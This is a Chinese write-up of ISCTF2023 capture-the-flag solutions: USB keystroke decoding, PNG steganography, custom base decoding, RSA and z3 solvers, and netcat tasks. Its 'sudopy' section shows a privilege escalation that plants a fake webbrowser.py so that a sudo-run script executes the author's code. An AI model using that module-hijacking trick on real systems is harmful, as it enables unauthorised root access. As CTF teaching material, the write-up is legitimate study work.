normalKeys = {"04":"a", "05":"b", "06":"c", "07":"d", "08":"e", "09":"f", "0a":"g", "0b":"h", "0c":"i", "0d":"j", "0e":"k", "0f":"l", "10":"m", "11":"n", "12":"o", "13":"p", "14":"q", "15":"r", "16":"s", "17":"t", "18":"u", "19":"v", "1a":"w", "1b":"x", "1c":"y", "1d":"z","1e":"1", "1f":"2", "20":"3", "21":"4", "22":"5", "23":"6","24":"7","25":"8","26":"9","27":"0","28":"","29":"","2a":"", "2b":"\t","2c":"","2d":"-","2e":"=","2f":"[","30":"]","31":"\\","32":"","33":";","34":"'","35":"","36":",","37":".","38":"/","39":"","3a":"","3b":"", "3c":"","3d":"","3e":"","3f":"","40":"","41":"","42":"","43":"","44":"","45":""}
 
shiftKeys = {"04":"A", "05":"B", "06":"C", "07":"D", "08":"E", "09":"F", "0a":"G", "0b":"H", "0c":"I", "0d":"J", "0e":"K", "0f":"L", "10":"M", "11":"N", "12":"O", "13":"P", "14":"Q", "15":"R", "16":"S", "17":"T", "18":"U", "19":"V", "1a":"W", "1b":"X", "1c":"Y", "1d":"Z","1e":"!", "1f":"@", "20":"#", "21":"$", "22":"%", "23":"^","24":"&","25":"*","26":"(","27":")","28":"","29":"","2a":"", "2b":"\t","2c":"","2d":"_","2e":"+","2f":"{","30":"}","31":"|","32":"","33":"\"","34":":","35":"","36":"<","37":">","38":"?","39":"","3a":"","3b":"", "3c":"","3d":"","3e":"","3f":"","40":"","41":"","42":"","43":"","44":"","45":""}
 
 
nums = []
keys = open(r"C:\Users\abc\Desktop\blue.txt")
for line in keys:
    if len(line)!=17: #首先过滤掉鼠标等其他设备的USB流量
         continue
    nums.append(line[0:2]+line[4:6]) #取一、三字节
keys.close()
output = ""
for n in nums:
    if n[2:4] == "00" :
        continue
 
    if n[2:4] in normalKeys:
        if n[0:2]=="02": #表示按下了shift
            output += shiftKeys [n[2:4]]
        else :
            output += normalKeys [n[2:4]]
    else:
        output += ''
print('output :' + output)

output :aggsz{kp_wn_yrv_sosov_jemzusfyffjs!!b!}

-> 大写 -> 删除

删除的内容“soezusb"为key,剩余"Aggsz{Kp_wn_YRV_sov_jmfyffjs!!!}”为明文维吉尼亚解密

得到flag:Isctf{So_ez_USB_and_vigenere!!!}

sudopy

需要提权 sudo-l

image-20231128121721526

web.py内无参数可控

但是import了 webbrowser.py

我们在同目录写一个 webbrowser.py

import os

def open(url):
    res = os.popen("./flag").read()
    print(res)

然后sudo执行

ISCTF2023 部分wp_第35张图片

PNG的基本食用

part1 crc爆破宽高

ISCTF2023 部分wp_第36张图片

part2

有个wbstego 没找到key 根据语义猜测easy

或许是这个(ISCTF2023 部分wp_第37张图片

part3 lsb隐写了一个7z 可以手动弄出来 不弄出来也可以直接看见里面的明文

ISCTF2023 部分wp_第38张图片

最终 png-is-easy-for-you

Beyond Hex, Meet Heptadecimal

看看构造

table = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ"
data = "ID71QI6UV7NRV5ULVJDJ1PTVJDVINVBQUNT"
flag = ""

for i in data:
    print(bin(table.index(i))[2:])

ISCTF2023 部分wp_第39张图片

补到5位解码试试

from Crypto.Util.number import *

table = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ"
data = "ID71QI6UV7NRV5ULVJDJ1PTVJDVINVBQUNT"
flag = ""

for i in data:
    flag += bin(table.index(i))[2:].zfill(5)

print(long_to_bytes(int(flag)))
# b'\x04\x0c\x16\xc1\xb0L\xd3u\x95\x03\xbfv\x98\xf0V\x13\x05\xfcv?\xf3)\xf3\xf3\x0e\xb3\xd0\x91zD\xdd(P\x95\x08\xd4\xc3Q\x96\xee\x1e\xd6$\\\xce\xbf\xae\x17rW+\xffJ\x01V\x97W\x18tT%\r\xb7\xf0rZU.\xfe\x17\x8a,\xbd'

那尝试手动写个flag头看看二进制

# 1001001101001110000111010100100011011110111110011110111110111111100101111101010111111100110110110011000011100111101111111001101101111111001010111111110101111010111101011111101
# 100100110100111000011101010010001101111011

发现是完全对的上的

只是7位一输出 那么最终脚本为

table = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ"
data = "ID71QI6UV7NRV5ULVJDJ1PTVJDVINVBQUNT"
flag=""
for i in data:
    flag+=bin(table.index(i))[2:].zfill(5)

for i in range(int(len(flag)/7)):
    ascii_value = int(flag[i * 7:i * 7 + 7], 2)
    print(chr(ascii_value), end="")

re

crackme

运行即可

ISCTF2023 部分wp_第40张图片

babyRe

一看output先猜e=65537的rsa

from Crypto.Util.number import *
import gmpy2
from z3 import *
ppq = 292884018782106151080211087047278002613718113661882871562870811030932129300110050822187903340426820507419488984883216665816506575312384940488196435920320779296487709207011656728480651848786849994095965852212548311864730225380390740637527033103610408592664948012814290769567441038868614508362013860087396409860
pp1p = 21292789073160227295768319780997976991300923684414991432030077313041762314144710093780468352616448047534339208324518089727210764843655182515955359309813600286949887218916518346391288151954579692912105787780604137276300957046899460796651855983154616583709095921532639371311099659697834887064510351319531902433355833604752638757132129136704458119767279776712516825379722837005380965686817229771252693736534397063201880826010273930761767650438638395019411119979149337260776965247144705915951674697425506236801595477159432369862377378306461809669885764689526096087635635247658396780671976617716801660025870405374520076160
c = 5203005542361323780340103662023144468501161788183930759975924790394097999367062944602228590598053194005601497154183700604614648980958953643596732510635460233363517206803267054976506058495592964781868943617992245808463957957161100800155936109928340808755112091651619258385206684038063600864669934451439637410568700470057362554045334836098013308228518175901113235436257998397401389511926288739759268080251377782356779624616546966237213737535252748926042086203600860251557074440685879354169866206490962331203234019516485700964227924668452181975961352914304357731769081382406940750260817547299552705287482926593175925396
# p,q = Ints("p q")
# s =Solver()
# s.add(p+q == ppq, (p+1)*(q+1) == pp1p)
# s.check()
# print(s.model())

q = 134094011928749729545065371362722609977806129489242508442578343348280145193982491886499134122427647316566435728309986082300710321155285426063169136067309204867535093965561302236683205598674944172719159174122755219401284720417311361738339972425053993540349468981181899812597265310200720861584501167926682130629
p = 158790006853356421535145715684555392635911984172640363120292467682651984106127558935688769217999173190853053256573230583515796254157099514425027299853011574428952615241450354491797446250111905821376806678089793092463445504963079378899187060678556415052315479031632390956970175728667893646777512692160714279231
n = p*q
e = 65537
d = gmpy2.invert(e,(p-1)*(q-1))
print(long_to_bytes(pow(c,d,n)))

eazyre

非预期 hint2给了md5

somd5一把梭

ISCTF2023 部分wp_第41张图片

easy_z3

from z3 import*
from Crypto.Util.number import *
# print("Please input flag:")
# flag = input()
# if len(flag)!=42:
# 	print("Check your length!")
# 	exit()

# l=[]
# for i in range(6):
# 	s=""
# 	for j in flag[i*7:i*7+7]:
# 		s+=hex(ord(j))[2:]
# 	l.append(int(s,16))
# if (

x1, x2, x3, x4, x5, x6 = Ints("x1 x2 x3 x4 x5 x6")
x = [x1,x2,x3,x4,x5,x6]
s = Solver()
s.add(
(593*x[5] + 997*x[0] + 811*x[1] + 258*x[2] + 829*x[3] + 532*x[4])== 0x54eb02012bed42c08 ,
(605*x[4] + 686*x[5] + 328*x[0] + 602*x[1] + 695*x[2] + 576*x[3])== 0x4f039a9f601affc3a ,
(373*x[3] + 512*x[4] + 449*x[5] + 756*x[0] + 448*x[1] + 580*x[2])== 0x442b62c4ad653e7d9 ,
(560*x[2] + 635*x[3] + 422*x[4] + 971*x[5] + 855*x[0] + 597*x[1])== 0x588aabb6a4cb26838 ,
(717*x[1] + 507*x[2] + 388*x[3] + 925*x[4] + 324*x[5] + 524*x[0])== 0x48f8e42ac70c9af91 ,
(312*x[0] + 368*x[1] + 884*x[2] + 518*x[3] + 495*x[4] + 414*x[5])== 0x4656c19578a6b1170
)
s.check()
print(s.model())
# ):
# 	print("Good job!")
# else:
# 	print("Wrong\nTry again!!!")
# 	exit()

x6= 26860403902456189
x4= 32765855640286324
x5= 28554726411354222
x3= 31015537033047360
x2= 13615593641303915
x1 = 20639221941697358
x = [x1, x2, x3, x4, x5, x6]
for i in range(6):
	print(long_to_bytes(x[i]).decode(),end="")

FloweyRSA

ISCTF2023 部分wp_第42张图片

e = 465

n = 3162244531

ezrsa

from Crypto.Util.number import *
import gmpy2

n = 3162244531
c = [0x753C2EC5, 0x8D90C736, 0x81282CB0, 0x7EECC470, 0x944E15D3,0x2C7AC726, 0x717E8070, 0x30CBE439, 0x0B1D95A9C, 0x6DB667BB,0x1240463C, 0x77CBFE64, 0x11D8BE59]
e = 465

p = 56099
q = 56369


d = gmpy2.invert(e,(p-1)*(q-1))
res = [long_to_bytes(pow(i,d,n)).decode() for i in c]

print("".join(res))

pwn

test_nc

nc连上去就行

image-20231123131814088

nc_shell

cat /flag

你可能感兴趣的:(网络安全,安全)